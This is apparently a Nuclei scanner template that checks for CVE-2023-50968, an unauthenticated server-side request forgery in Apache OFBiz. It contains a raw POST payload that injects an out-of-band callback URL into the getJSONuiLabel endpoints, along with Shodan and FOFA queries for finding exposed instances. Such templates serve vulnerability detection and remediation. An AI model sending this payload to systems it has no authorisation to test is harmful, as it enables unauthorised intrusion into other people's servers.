nuclei-templates/http/cves/2023/CVE-2023-50968.yaml

id: CVE-2023-50968

info:
  name: Apache OFBiz < 18.12.11 - Server Side Request Forgery
  author: your3cho
  severity: high
  description: |
    Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.
  reference:
    - https://lists.apache.org/thread/x5now4bk3llwf3k58kl96qvtjyxwp43q
    - http://www.openwall.com/lists/oss-security/2023/12/26/2
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50968
  classification:
    cwe-id: CWE-200
    cve-id: CVE-2023-50968
    epss-score: 0.0006
    epss-percentile: 0.23746
  metadata:
    max-request: 4
    verified: true
    shodan-query: html:"OFBiz"
    fofa-query: app="Apache_OFBiz"
    vendor: apache
    product: ofbiz
  tags: cve,cve2023,apache,ofbiz,ssrf

variables:
  str: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /partymgr/control/{{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{parameter}}={"http://{{interactsh-url}}/api":"{{str}}"}

    payloads:
      path:
        - getJSONuiLabel
        - getJSONuiLabelArray

      parameter:
        - requiredLabel
        - requiredLabels

    attack: clusterbomb
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: header
        words:
          - 'OFBiz.Visitor='
# digest: 4a0a004730450221008597734a36af3a33737386bbb0105d8c011e9092434eabfbc072e4519587069a02204e6afbd4959fa7c28526b69510b624b19782f51705bc1d9c53e22e79448a368a:922c64590222798bb761d5b6d8e72950